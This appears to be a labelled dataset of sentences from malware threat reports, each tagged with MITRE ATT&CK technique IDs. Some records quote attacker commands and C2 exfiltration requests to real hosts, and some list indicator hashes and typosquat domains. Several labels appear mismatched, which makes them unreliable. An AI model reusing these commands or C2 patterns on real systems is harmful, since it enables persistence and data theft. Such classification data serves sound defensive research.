{"text1":"All of these files reside in the victim\u2019s %TEMP% directory:    Filename Description   9PT568.dat Contains victim unique identifier   TPX498.dat Keystroke logs   edg499.dat List of interesting files   TPX499.dat Temporarily holds screenshot when given command by C2   up Temporarily contains downloaded file to be executed when given command by C2    \u00a0 Other changes we noticed in this variant include how the malware obfuscates C2 information stored via dead drop resolvers","labels":"['T1036', 'T1041']"}
{"text1":"Amongst the downloaded files, \u00a0the fake .gif and .jpg files appear to be dependencies for the malware","labels":"['T1083', 'T1105']"}
{"text1":"A much more advanced and highly obfuscated Javascript script was utilized in White Atlas samples that dropped a Firefox extension backdoor developed by Turla, but again the script was responsible for the simple tasks of writing out the extension.json configuration file for the extension and deleting itself for cleanup purposes","labels":"['T1070.004', 'T1064', 'T1027']"}
{"text1":"Any information gathered from the endpoint is first stored in the following file, encrypted, and sent to the control server:  C:\\DOCUME~1\\<username>\\APPLIC~1\\MICROS~1\\HNC\\1.hwp  The following information is gathered from the endpoint, stored in the file 1.hwp, and sent to the control server:  Directory listing of the user\u2019s Desktop folder using command:  cmd.exe \/c dir C:\\DOCUME~1\\<username>\\Desktop\\ >> C:\\DOCUME~1\\<username>\\APPLIC~1\\MICROS~1\\HNC\\1.hwp  Directory listing of the user\u2019s recently accessed files using command:  cmd.exe \/c dir C:\\DOCUME~1\\<username>\\Recent >> C:\\DOCUME~1\\<username>\\APPLIC~1\\MICROS~1\\HNC\\1.hwp  Directory listing of the system\u2019s %programfiles% folder using command:  cmd.exe \/c dir C:\\PROGRA~1\\ >> C:\\DOCUME~1\\<username>\\APPLIC~1\\MICROS~1\\HNC\\1.hwp  Systeminfo of the endpoint using command:  cmd.exe \/c systeminfo >> C:\\DOCUME~1\\<username>\\APPLIC~1\\MICROS~1\\HNC\\1.hwp  Copies the file ixe000.bin from:  C:\\Documents and Settings\\<username>\\Application Data\\Microsoft\\Windows\\UserProfiles\\ixe000.bin To: C:\\DOCUME~1\\<username>\\APPLIC~1\\MICROS~1\\HNC\\1.hwp  Registry key and value information for the current user\u2019s Run key (with information collected):  HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run Number of subkeys (<KeyIndex>) <KeyName> Number of Values under each key including the parent Run key (<ValueIndex>) <Value_Name> <Value_Content>  Registry Run key enumeration by Gold Dragon","labels":"['T1033', 'T1547.001', 'T1486']"}
{"text1":"Apart for its backdoor routines, this malware can steal information through keylogging, audio recording, and screen capture","labels":"['T1113', 'T1123']"}
{"text1":"A shortcut file is generated in the following path:  %TEMP%\\~Update.lnk  This \u2018~Update.lnk\u2019 file is then copied to a filename of \u2018Windows help.lnk\u2019, which is placed in the startup path previously identified","labels":"['T1036', 'T1547.009']"}
{"text1":"As shown in Figure 11, after compromising an initial victim's system (patient 0), the threat actors use the Baidu search engine to search for the victim's organization name","labels":"['T1082', 'T1083']"}
{"text1":"Assuming the victim opens the attachment, the infection process begins as described in the following section.Many of the distribution servers that are being used to host the HawkEye keylogger binaries that are retrieved during the infection process are hosting large numbers of malicious binaries and, in many cases, contain open directory listings that can be used to identify the scope of the infections that they are being used to facilitate","labels":"['T1057', 'T1056']"}
{"text1":"A string with the 5-character length and encoded with BASE64 is added to the beginning of the buffer encoded using the BASE64 algorithm","labels":"['T1027', 'T1132']"}
{"text1":"Attack Flow and Exfiltration After injecting into the targeted processes, the modules continue their malicious activity through those processes","labels":"['T1055', 'T1057']"}
{"text1":"AutoFocus customers may learn more from the DarkHydrus tag  IOC Related SHA256 Hashes Payloads cec36e8ed65ac6f250c05b4a17c09f58bb80c19b73169aaf40fa15c8d3a9a6a1 ac7f9c536153780ccbec949f23b86f3d16e3105a5f14bb667df752aa815b0dc4 a547a02eb4fcb8f446da9b50838503de0d46f9bb2fd197c9ff63021243ea6d88 d428d79f58425d831c2ee0a73f04749715e8c4dd30ccd81d92fe17485e6dfcda dd2625388bb2d2b02b6c10d4ee78f68a918b25ddd712a0862bcf92fa64284ffa b2571e3b4afbce56da8faa726b726eb465f2e5e5ed74cf3b172b5dd80460ad81 c8b3d4b6acce6b6655e17255ef7a214651b7fc4e43f9964df24556343393a1a3 ce84b3c7986e6a48ca3171e703e7083e769e9ced1bbdd7edf8f3eab7ce20fd00 99541ab28fc3328e25723607df4b0d9ea0a1af31b58e2da07eff9f15c4e6565c Delivery documents d393349a4ad00902e3d415b622cf27987a0170a786ca3a1f991a521bff645318 8063c3f134f4413b793dfc05f035b6480aa1636996e8ac4b94646292a5f87fde 9eac37a5c675cd1750cd50b01fc05085ce0092a19ba97026292a60b11b45bf49 cf9b2b40ac621aaf3241ff570bd7a238f6402102c29e4fbba3c5ce0cb8bc25f9 0a3d5b2a8ed60e0d96d5f0d9d6e00cd6ab882863afbb951f10c395a3d991fbc1 0b1d5e17443f0896c959d22fa15dadcae5ab083a35b3ff6cb48c7f967649ec82 870c8b29be2b596cc2e33045ec48c80251e668abd736cef9c5449df16cf2d3b8 ff0b59f23630f4a854448b82f1f0cd66bc4b1124a3f49f0aecaca28309673cb0 01fd7992aa71f4dca3a3766c438fbabe9aea78ca5812ab75b5371b48bd2625e2 6dcb3492a45a08127f9816a1b9e195de2bb7e0731c4e7168392d0e8068adae7a 47b8ad55b66cdcd78d972d6df5338b2e32c91af0a666531baf1621d2786e7870 776c056096f0e73898723c0807269bc299ae3bbd8e9542f0a1cbba0fd3470cb4 cf7863e023475d695c6f72c471d314b8b1781c6e9087ff4d70118b30205da5f0 e88045931b9d99511ce71cc94f2e3d1159581e5eb26d4e05146749e1620dc678 26e641a9149ff86759c317b57229f59ac48c5968846813cafb3c4e87c774e245 b5cfaac25d87a6e8ebabc918facce491788863f120371c9d00009d78b6a8c350 ad3fd1571277c7ce93dfbd58cee3b3bec84eeaf6bb29a279ecb6a656028f771c Related Domains maccaffe[.]com cisc0[.]net 0utl00k[.]net msdncss[.]com 0ffice[.]com 0ffiice[.]com micrrosoft[.]net anyconnect[.]stream bigip[.]stream  fortiweb[.]download  kaspersky[.]science  microtik[.]stream  owa365[.]bid  symanteclive[.]download  windowsdefender[.]win allexa[.]net kaspersky[.]host hotmai1[.]com 0utlook[.]bid","labels":"['T1087']"}
{"text1":"Backdoor.Remexi, one of the malware in use by Chafer, had the following \u00a0command and control\u00a0host: 87pqxz159.dockerjsbin[.]com Interestingly, IP address \u00a083.142.230.138, which\u00a0serve as a\u00a0command and control address for an OilRig related sample (3a5fcba80c1fd685c4b5085d9d474118), was pointed to by\u00a087pqxz159.dockerjsbin[.]com as well","labels":"['T1016', 'T1102']"}
{"text1":"The implant either fetches the user agent from Internet Explorer (using ObtainUserAgentAsString()) or uses a default user agent specified in the malware binary: Mozilla\/5.0 (Windows NT 6.1; WOW64) Chrome\/28.0.1500.95 Safari\/537.36 Control Server Communications. The malware initiates communication with the control server by sending it an HTTP POST request with additional optional HTTP data.","labels":"['T1036', 'T1048', 'T1132']"}
{"text1":"Based on the McAfee Advanced Threat Research team\u2019s analysis, we find multiple components from this operation are unique from a code perspective, even though the code is loosely based on previous versions of the SYSCON backdoor","labels":"['T1140', 'T1027.001']"}
{"text1":"By using this method, it will copy itself into a running Internet Explorer process in order to avoid detection by running as an independent process","labels":"['T1055', 'T1057']"}
{"text1":"C2 Command   Purpose    reboot  Reboot the system using shutdown command    shutdown  Shut down the system using shutdown command    clean  Wipe the Drives, C:\\, D:\\, E:\\, F:\\    screenshot  Take a screenshot of the System    upload  Encrypt and upload the information from the system    excel  Leverage Excel.Application COM object for code execution    outlook  Leverage Outlook.Application COM object for code execution    risk  Leverage DCOM object for code execution   Conclusion This activity shows us that TEMP.Zagros stays up-to-date with the latest code execution and persistence mechanism techniques, and that they can quickly leverage these techniques to update their malware","labels":"['T1113', 'T1082', 'T1053.005', 'T1106', 'T1140']"}
{"text1":"ChromeUpdate.exe starts the file with \u201crundll32 cache.dll,ADB_Setup\u201d Cache.dll analysis  Cache.dll was written in C\/C++ and built with a Microsoft compiler","labels":"['T1055', 'T1218.011']"}
{"text1":"Code is included to copy the clipboard, delete files, compress files, clear event logs, shut down the machine, and much more","labels":"['T1115', 'T1070.004', 'T1070']"}
{"text1":"Command_Keylog_offline:\u00a0 Load into memory a dll that contains the function \u201cPluginMe\u201d.\u00a0 After researching and analyzing additional Gh0stRAT samples while trying to figure out what dll contains \u201cPluginMe\u201d, I found a DLL for keylogging (called Keylog.dll) in a Gh0stRAT 2.0 sample that exported \u201cPluginMe\u201d.\u00a0 Using that and a cross-comparison of another Gh0stRAT sample that I\u2019ve previously analyzed, I was able to determine that \u201cPluginMe\u201d is a offline keyboard manager","labels":"['T1055', 'T1574.001', 'T1218.011', 'T1574.002', 'T1056']"}
{"text1":"Command_Update_Server:\u00a0 This command passes the string \u201cGh0st Update\u201d to the malware sample before running the sample again.\u00a0 When the sample restarts, it detects the \u201cGh0st Update\u201d command line arg, and connects to the server in order to update the sample.\u00a0 Command_Clean_Event:\u00a0 This command locates and deletes all of the event logs on the system","labels":"['T1070.004', 'T1059', 'T1070', 'T1102']"}
{"text1":"Command   Description    0x31  Fingerprint System via WMI and Registry    0x32  Drop File and execute    0x33  Remote Shell    0x34  Terminate connection with C2    0x35  Download and run batch script    0x36  Download file on machine    0x37  Upload File    Table 2: FELIXROOT backdoor commands Figure 9 shows the log message decrypted from memory using the same mechanism shown in Figure 6 and Figure 7 for every command executed","labels":"['T1064', 'T1105']"}
{"text1":"Command  Description  Action  0  Server response string contains batch commands  Execute batch commands and send results back to server  1  Server response string is a file path  Check for file path and upload (PUT) the file to server  2  Server response string is a file path  Check for file path and download (GET) the file   Table 1: POWRUNER commands After successfully executing the command, POWRUNER sends the results back to the C2 server and stops execution","labels":"['T1070.006', 'T1041', 'T1105']"}
{"text1":"Command Functionality   Init Create a reverse shell   Write Write a file to the compromised system from the C2 server   List List the files in a directory   Upload Upload a file from the compromised system to the C2 server    Table 2","labels":"['T1041', 'T1105']"}
{"text1":"Command IDDescription     0Uninstall Keydnap and quit   1Update the backdoor from a base64-encoded file   2Update the backdoor given a URL   3Decode and execute a base64-encoded file   4Decode and execute a base64-encoded Python script   5Download and execute a file from a URL   6Download and execute a Python script from a URL   7Execute a command and report the output back to the C&C server   8Request administrator privileges the next time the user runs an application   9Decode and execute, or stop, a base64-encoded file calledauthd_service    The last two commands stand out","labels":"['T1140', 'T1132', 'T1569.002']"}
{"text1":"Comnie will make requests to these URLs, looking for base64-encoded data after an identifier of \u2018magnet:\/\u2019, as seen in the example below: Figure 14 GitHub storing Comnie C2 information In the example above, the C2 information is being stored within the user\u2019s URL parameter within GitHub","labels":"['T1102', 'T1041']"}
{"text1":"Continuing Malicious Activity and Manipulating Additional Security Products After the module loads with regsvr32.exe, the Irdsnhrxxxfery64 module injects another module Irdsnhrxxxfery98, which was downloaded by the script into regsvr32.exe using the LoadLibraryExW() function","labels":"['T1055', 'T1218.010']"}
{"text1":"Create processes Write responses from the control server to a file Send information for all drives Write data sent by the control server to a temporary file matching the file path pattern %temp%\\DWS00* Change the time of a file as specified by the control server  The malware changing the file time","labels":"['T1070.006', 'T1074', 'T1041']"}
{"text1":"cUpdateCheckers.bat is launched and creates a scheduled task for GoogleUpdateschecker.vbs persistence","labels":"['T1053.005', 'T1064']"}
{"text1":"Cyber analysts are encouraged to review the information provided in this alert to detect signs of malicious network activity.Tools and capabilities used by HIDDEN COBRA actors include DDoS botnets, keyloggers, remote access tools (RATs), and wiper malware","labels":"['T1518.001', 'T1018']"}
{"text1":"Decrypted Config: C&C IP: 192.168.0.107 Port: 80 Sleep Timer: 30000 Campaign Identifier: Mirage If you look at it the decrypted configuration, you may notice that the IP being used for the C&C is an internal IP address","labels":"['T1140', 'T1016']"}
{"text1":"Deletes the registry key HKCU\\Software\\Classes\\Applications\\rundll32.exe\\shell\\open Deletes the dropper components from the system","labels":"['T1070.004', 'T1112']"}
{"text1":"Different colors show the three dropped modules: legit app (blue), launcher (green), and decompressor with the Trojan embedded (red) The initial module drops three files that are typical for Chinese-speaking actors: a legit Symantec pcAnywhere (IntgStat.exe) for DLL side loading, a .dll launcher (pcalocalresloader.dll) and the last-stage decompressor (thumb.db)","labels":"['T1055', 'T1574.002']"}
{"text1":"Downloading stylesheets allows for emended JavaScript and VBS to be run from within them, at which point any type of malware could be staged and run quite easily","labels":"['T1064', 'T1547.001']"}
{"text1":"During our investigation of one of the compromised servers we found an application that, at first glance, appeared to be a legitimate SSH server called Dropbear SSH","labels":"['T1036', 'T1021']"}
{"text1":"During the exfiltration process, the malware Base64-encodes the encrypted data and sends it to its control server using an HTTP POST request to the URL:  http:\/\/ink[dot]inkboom.co.kr\/host\/img\/jpg\/post.php  HTTP data\/parameters used in the request include:  Content-Type: multipart\/form-data; boundary=\u2014-WebKitFormBoundar ywhpFxMBe19cSjFnG <followed by base64 encoded & encrypted system info> User Agent: Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; .NET CLR 1.1.4322) Accept-Language: en-us HTTP Version: HTTP\/1.0    The malware can also download and execute additional components served to it by the control server","labels":"['T1071', 'T1048', 'T1132', 'T1486']"}
{"text1":"During the past few months, APT34 has been able to quickly incorporate exploits for at least two publicly vulnerabilities (CVE-2017-0199 and CVE-2017-11882) to target organizations in the Middle East","labels":"['T1068', 'T1203']"}
{"text1":"Embed \"scriptlets\" in generated payloads to perform some tasks \"offline\" without needing network connectivity (ex: start keylogger, add persistence, execute custom python script, check_vm, etc.)   Multiple Target Platforms:      Platform Support Status     Windows XP Supported   Windows 7 Supported   Windows 8 Supported   Windows 10 Supported   Linux Supported   Mac OSX Limited Support   Android Limited Support    Documentation All documentation can be found on the wiki","labels":"['T1106', 'T1010']"}
{"text1":"Encoding the encryption key  In order for the C&C server to decrypt the encrypted data, the randomly generated AES256 key must be included in the packet along with the encrypted data","labels":"['T1573', 'T1486']"}
{"text1":"Encrypted Configuration in shellcode The configuration information for the malware, including the C2 information are encrypted in the first shellcode blob and are passed as an argument to the DllMain function of the main PlugX DLL","labels":"['T1082', 'T1140', 'T1027']"}
{"text1":"Escalate Privileges APT40 uses a mix of custom and publicly available credential harvesting tools to escalate privileges and dump password hashes","labels":"['T1003', 'T1068']"}
{"text1":"Examining the use of the unique user agents\u2019 strings over time shows that while previously only the Mozilla\/5.0 user agent was in use, since mid 2017 all three user agent strings have been used by the Zebrocy tool for its C2 communications","labels":"['T1033', 'T1543.001']"}
{"text1":"Exfiltration BRONZE UNION has also leveraged various web shells to collect and stage data for exfiltration","labels":"['T1074', 'T1505.003', 'T1132']"}
{"text1":"Figure 11: XML configuration file to schedule the task The Zyklon malware first retrieves the external IP address of the infected machine using the following:  api.ipify[.]org ip.anysrc[.]net myexternalip[.]com whatsmyip[.]com  The Zyklon executable contains another encrypted file in its .Net resource section named tor","labels":"['T1036', 'T1027']"}
{"text1":"Figure 12: RSA public key 1    Figure 13: RSA public key 2    Figure 14: AES encryption parameters After encryption, the cipher text to be sent over C2 is Base64 encoded","labels":"['T1573']"}
{"text1":"Figure 13: Zyklon issuing \u201csettings\u201d command and subsequent server response    Figure 14: Zyklon issuing \u201csign\u201d command and subsequent server response    Figure 15: Zyklon issuing \u201cddos\u201d command and subsequent server response Plugin Manager Zyklon downloads number of plugins from its C2 server","labels":"['T1016', 'T1105']"}
{"text1":"Figure 2: Textbox inside DOC The combined script from Word textbox drops the following components: \\Users\\[user_name]\\Intel\\58d2a83f7778d5.36783181.vbs \\Users\\[user_name]\\Intel\\58d2a83f777942.26535794.ps1 \\Users\\[user_name]\\Intel\\58d2a83f777908.23270411.vbs Also, the script creates a named schedule task for persistence to launch \u201c58d2a83f7778d5.36783181.vbs\u201d every 25 minutes","labels":"['T1033', 'T1036', 'T1087', 'T1064', 'T1204']"}
{"text1":"Figure 26.\u00a0Communication with the C&C server after the exchange of OS packet info Meanwhile, the runHandle method of the main backdoor loop will call for the requestServer method with the following backdoor commands (each command has one byte long code and is extracted by Packet::getCommand):   Figure 27.\u00a0The getCommand method The figure below shows the example of two of several possible command codes","labels":"['T1140', 'T1008']"}
{"text1":"Figure 4: APT32 ActiveMime Lures Create Two Named Scheduled Tasks In this example, a scheduled task named \u201cWindows Scheduled Maintenance\u201d was created to run Casey Smith\u2019s \u201cSquiblydoo\u201d App Whitelisting bypass every 30 minutes","labels":"['T1053.005', 'T1036']"}
{"text1":"Figure 5: Sample pseudo-HTTP beacon The pseudo-HTTP protocol uses any proxies discovered by the HTTP proxy monitoring thread or added by the adminka command","labels":"['T1071', 'T1090']"}
{"text1":"File Indicators Samples Observed from Spear Phishing Messages Above    Filename Chinas_Arctic_Dream.doc   File Size 6587812 bytes   MD5 598eeb6a18233023f3551097aa49b083   SHA1 e9a46966f93fe15c22636a5033c61c725add8fa5   Notes Malicious RTF document that exploits CVE-2017-8570 and drops QuasarRAT file qrat.exe","labels":"['T1036', 'T1083']"}
{"text1":"Filename The_Four_Traps_for_China.doc   File Size 4428595 bytes   MD5 7659c41a30976d523bb0fbb8cde49094   SHA1 3f1f3e838a307aff52fbcb5bba5e4c8fe68c30e5   Notes Malicious RTF document that exploits CVE-2017-8570 and drops QuasarRAT file qrat.exe","labels":"['T1036']"}
{"text1":"FIN7 uses CARBANAK as a post-exploitation tool in later phases of an intrusion to cement their foothold in a network and maintain access, frequently using the video command to monitor users and learn about the victim network, as well as the tunnel command to proxy connections into isolated portions of the victim environment","labels":"['T1090', 'T1049']"}
{"text1":"Finally, the malware executes the extracted install.bat script before deleting the original files and exiting","labels":"['T1070.004', 'T1064']"}
{"text1":"Finally, the Trojan creates a scheduled task to run itself every three minutes by running the following command on the command prompt after replacing the %path% string with the path to the srvResesponded.vbs VBScript:SchTasks \/Create \/SC MINUTE \/MO 3 \/TN \u201cInetlSecurityAssistManager\u201d \/TR \u201cwscript %path%\u201d \/f The Trojan uses HTTP to communicate with its C2 server, specifically using the InternetExplorer application object within an embedded Microsoft .NET Framework assembly called Interop.SHDocVw","labels":"['T1071', 'T1053.005']"}
{"text1":"First, the macro attempts to enable macros in multiple versions of Word, PowerPoint, Publisher and Excel by setting the following registry keys to the value of 1: HKCU\\Software\\Microsoft\\Office\\11.0\\Word\\Security\\VBAWarnings  The macro also attempts to disable protections provided by the Protected View capability within Word, Excel, and PowerPoint by setting the following registry keys to a value of 1: HKCU\\Software\\Microsoft\\Office\\11.0\\Word\\Security\\ProtectedView\\DisableInternetFilesInPV  \u00a0 First Stage Payload The payload installed by the macro is a downloader Trojan written in VB.NET that downloads a secondary payload and decoy document","labels":"['T1553.002', 'T1518.001', 'T1005', 'T1027.001', 'T1112', 'T1598.002', 'T1204', 'T1203', 'T1497']"}
{"text1":"Following these checks, it drops several more malware files signed with the pasted AMD digital signature to a directory it creates","labels":"['T1553.002', 'T1083']"}
{"text1":"For example, From <COMPUTER-NAME> (01-04 11-40-02).txt  All the text files are now packed into the archive temp.zip (%temp%\\temp.zip) zip is Base64 encoded (with a custom key, same as that used in the malicious document) and then copied to post.txt txt is uploaded to the control server  Additional Commands and Capabilities The service-based DLL implant traverses to the \/htdocs\/ directory on the FTP server and looks for any files with the keywords:  TO EVERYONE: Commands issued to all infected endpoints TO <COMPUTERNAME>: Commands issued to endpoints matching the ComputerName  The following commands are supported by the malware implant:  cmd \/c pull <filename>: Adds filename to temp.zip, Base64 encodes, and uploads to control server cmd \/c chip <string>: Deletes current ipnet.ini config file","labels":"['T1059', 'T1560', 'T1132']"}
{"text1":"For example, the following string would be included in one of the HTTP parameters sent to the C2 server: eRmaVsr90D-7Ig1ngV3PkdouzP974 In this specific case, the actor made a mistake when configuring this XAgent sample with its C2 locations","labels":"['T1071', 'T1008']"}
{"text1":"For instance, here are the resulting decrypted strings from each of the case statements (dd7e69e1\u2026): Case \u2013 String decrypted 1 \u2013 185.25.50[.]93 2 \u2013 POST http:\/\/185.25.50[.]93\/syshelp\/kd8812u\/protocol.php HTTP\/1.1\\r\\nHost: 185.25.50[.]93\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 3 \u2013 porg= 4 \u2013 Content-Length: The Trojan uses raw sockets to communicate with its C2 server and uses the decrypted string above to create HTTP requests","labels":"['T1071', 'T1140', 'T1008']"}
{"text1":"For instance, the following data exists within a resource: fb 70 b0 c9 bd c5 8a d4 0c 54 fd 4c 6d bb f0 0f By multiplying each byte with -1, we obtain the following data: 05 90 50 37 43 3b 76 2c f4 ac 03 b4 93 45 10 f1 After using RC4 and the key 14331d289e737093994395d3fc412afc, the following cleartext data appears: \\x00\\x00\\x00\\x00FlashRun.vbs We do not see the payload using this FlashRun.vbs filename, instead it uses a temporary file name to store an embedded VBScript file, such as %Temp%\\4.tmp\\5.vbs","labels":"['T1036', 'T1064', 'T1486']"}
{"text1":"From our analysis, stealing keystrokes is the main function of RunningRat; however, the DLL has code for more extensive functionality","labels":"['T1140', 'T1056']"}
{"text1":"From those servers the threat actor could use a web shell to retrieve the encrypted archives:  copy \\\\{FILE PATH}\\c$\\programdata\\*.tmp \\\\{FILE PATH}\\ServiceDesk\\custom\\style After exfiltrating the files, the threat actor used web shell access on the staging server to delete the staged RAR archives and detach their network shares, likely to avoid detection","labels":"['T1070.004', 'T1505.003']"}
{"text1":"Function for scrambling AES256 key in the outgoing packet  Some screenshots taken during scrambling and encryption process:   Figure 21.\u00a0The highlighted bytes represent the scrambled computer info   Figure 22.\u00a0Randomly generated AES256 key   Figure 23.\u00a0Scrambled AES256 key (0xC1 XOR 0x13 = 0xD2, 0xD2 ROL 6 = 0xB4) etc.)   Figure 24.\u00a0Computer info encrypted with AES256 key   Figure 25.\u00a0Screenshot of the final payload to be sent to C&C server","labels":"['T1113', 'T1573']"}
{"text1":"Gather the process time for all processes  Getting time information for all processes running on the system","labels":"['T1055', 'T1057', 'T1124']"}
{"text1":"Generate payloads in various formats:      Format Architecture Short Name     Android Package x86 & ARMv7 apk   Linux Binary x86 lin_x86   Linux Binary x64 lin_x64   Linux Shared Object x86 so_x86   Linux Shared Object x64 so_x64   Windows PE Executable x86 exe_x86   Windows PE Executable x64 exe_x64   Windows DLL x86 dll_x86   Windows DLL x64 dll_x64   Python Script x86 & x64 py   PyInstaller x86 & x64 pyinst   Python Oneliner x86 & x64 py_oneliner   Powershell x86 & x64 ps1   Powershell Oneliner x86 & x64 ps1_oneliner   Ducky Script N\/A rubber_ducky      Deploy in memory from a single command line using python or powershell one-liners","labels":"['T1106', 'T1010', 'T1059.001']"}
{"text1":"Get-Process | select Company Checks to see if any running processes have \u201cWireshark\u201d or \u201cSysinternals\u201d as the company name","labels":"['T1518.001', 'T1057']"}
{"text1":"Having a Meterpreter session on a compromised computer allows for full control of the computer and exfiltration of any data, and in some cases lateral movement inside the organization","labels":"['T1123', 'T1132']"}
{"text1":"Here is the content of the file: \/shellcode <90909090909090909090E800<...redacted\u2026>4D2D6DC95CBD5DC1811111111111111> def <7B0D0A2756...redacted\u2026>312067657420636C6F736566696C650D0A717569740D0A7D> token pop exch pop Exec  The executed shellcode will first perform a decoding routine designed to download an additional payload from the internet","labels":"['T1064', 'T1105']"}
{"text1":"High Commissioner of Bangladesh Pakistan eying Sukhoi-35 fighter planes as part of defense deal from Russia 2018.143 PG COURSE IN 2018-2021 BATCH India Bangladesh and Pakistan Press Release on Observance of Historic Mujibnogor Dibosh by Pakistan Mission on 17 April 2018 Afghan Bomb Blast report by ISI USAJOBS Daily Saved Search Results for New GS15 for 3\/30\/2018 How Rigging take place in Senate Elections in Pakistan Afghan Terrorist group details ISI Restricted113 1971 Liberation War Freedom Fighters in Pakistan Army Custody Database  Additionally, the following filenames were witnessed in these attacks (spelling and grammar mistakes included):  Liberation Freedom Fighter.xlam NSC details of participants.xlam Raw Sect Vikram report on Pak Army Confidential.doc USA Immagration Policy for Families.ppam doc CV FM.doc doc Sukhoi35 deal report.doc Nominal Roll.doc Press Release 17 April.doc Afghan Blast report by ISI.doc Rigging in Pakistan Senate.doc Afghan Terrorist group report.doc  \u00a0 The payloads for these attacks varied in malware family","labels":"['T1083']"}
{"text1":"Hook module structure After decrypting the strings, it became clear that the Linux Hook main module communicated with the same CnC server as other Windows modules:  The CNC\u2019s IP address in the Linux module This Linux module can process the following commands, some of which are similar to the Windows version:    die  delete all BlackEnergy2 files and system traces   kill  delete all BlackEnergy2 files and system traces and reboot   lexec  launch a command using bin\/sh   rexec  download and launch file using \u2018fork\/exec\u2019   update  rewrite self file   migrate  update the CnC server    Windows Plugins After the disclosure of an unusual CnC server that pushed Linux and the new Windows plugins we paid greater\u00a0attention to new BE2 samples and associated CnCs","labels":"['T1106', 'T1070.004', 'T1105']"}
{"text1":"However, if you DO get infected, you\u2019ll want to delete the following registry keys (if they exist): HKLM\/System\/CurrentControlSet\/Services\/DirecastX ytasda jrqq HKLM\/System\/CurrentControlSet\/Services\/DirectX yta jsdrq HKLM\/System\/CurrentControlSet\/Services\/DirectX ytsda jrq Additionally, you\u2019ll want to delete any copies of \u201csvchost.exe\u201d that you find in %Program Files (x86)%\/DIFXE\/, as these are the dropped copies of the malware","labels":"['T1070.004', 'T1112']"}
{"text1":"However, we were able determine a unique, hard-coded user agent used for the C2 communications: Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.1) Using AutoFocus, we pivoted from the user agent string to expand our data set to three additional Zebrocy samples using the exact same user agent","labels":"['T1087', 'T1543.001']"}
{"text1":"If that fails, the payload will use DNS tunneling by first issuing a DNS query to resolve the following domain to notify the C2 that the payload will send data to it in subsequent DNS queries: \u00a0 ns1.<random number between 100000 and 999999>.<c2 name> \u00a0 The payload will then split the message up into 60-byte chunks (only 1 in this case), which it will send to the C2 via DNS queries to resolve domains structured as: \u00a0 <encoded\/encrypted data of message>.<same random number between 100000 and 999999>.<c2 name> \u00a0 The payload will notify the C2 that it is done sending data by issuing a DNS query to resolve a domain structured as: \u00a0 ns2.<same random number between 100000 and 999999>.<c2 name> \u00a0 Package Comparison of the QUADAGENT Samples The bat2exe version (SHA256: 5f001f3387ddfc0314446d0c950da2cec4c786e2374d42beb3acce6883bb4e63)has a batch script, PowerShell script, and associated file names embedded within several resources that it will decrypt using RC4 and various MD5 hashes for keys","labels":"['T1071', 'T1573', 'T1048', 'T1008']"}
{"text1":"If the C2 server provides the appropriate echoed data in the response, the Trojan attempts to determine what\u00a0 commands the C2 wishes to run by issuing a request to the following URL:http:\/\/<c2 domain>\/what?<hex(Environment.UserName\/Environment.MachineName)> After issuing the what command, the Trojan will parse the C2\u2019s response for the string Oops, which the Trojan will treat as the C2 making a mistake and will exit","labels":"['T1071', 'T1573', 'T1041', 'T1571', 'T1132', 'T1008', 'T1043']"}
{"text1":"If the mutex does not exist and a Windows Startup Registry key with name \u201cSystem Update\u201d does not exist, the malware performs its initialization routine by:  Copying itself to the path %PROGRAMDATA%\\svchost.exe Sets the Windows Startup Registry key with the name \u201cSystem Update\u201d which points to the above dropped payload","labels":"['T1112', 'T1547.001']"}
{"text1":"If there are keys for the string encryption with the XOR algorithm, the configuration data will be also encrypted with the XOR algorithm","labels":"['T1573', 'T1027']"}
{"text1":"If the Trojan receives this echo, it will create the following file that the Trojan uses as a signal that it was able to successfully communicate with its C2 server: %APPDATA%\\Windows\\ShwDoc.srv If the Trojan determines the C2 server wishes to send a command, it sends an HTTP request to the following URL: hxxp:\/\/www.windowspatch[.]com\/tahw?<hex(STDOUT of whoami command)> The Trojan will first check the response to this request for the string spoo, which signifies the C2 does not wish to issue a command","labels":"['T1071', 'T1008']"}
{"text1":"If unable to contact the C2 server initially, the shellcode is configured to reattempt communication with the C2 server address in the following pattern: \u00a0[a-z][a-z][a-z].stage.14919005.www1.proslr3[.]com VBScript #2 \u201cmshta.exe\u201d further executes the second VBScript \u201c58d2a83f777908.23270411.vbs\u201d, which creates a folder by GUID name inside \u201cIntel\u201d and drops the VBScript payloads and configuration files: \\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f777638.60220156.ini \\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f777688.78384945.ps1 \\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f7776b5.64953395.txt \\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f7776e0.72726761.vbs \\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f777716.48248237.vbs \\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f777788.86541308.vbs \\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\Foxconn.lnk This script then executes \u201c58d2a83f777716.48248237.vbs\u201d, which is a variant of FIN7\u2019s HALFBAKED backdoor","labels":"['T1036', 'T1064']"}
{"text1":"In 2016, CTU researchers observed the group using native system functionality to disable logging processes and delete logs within a compromised environment","labels":"['T1562.001', 'T1070.004']"}
{"text1":"In all of the DropIt samples we collected, the dropper will then save the executable to the user\u2019s %TEMP% folder and execute the file, specifically to one of the following filenames:  %TEMP%\\spp.exe %TEMP%\\sloo.exe %TEMP%\\spoo.exe %TEMP%\\vschos.exe  We have also seen Magic Hound using DropIt like a binder Trojan, specifically dropping a legitimate decoy executable along with the malicious executable as a payload","labels":"['T1055.012', 'T1036']"}
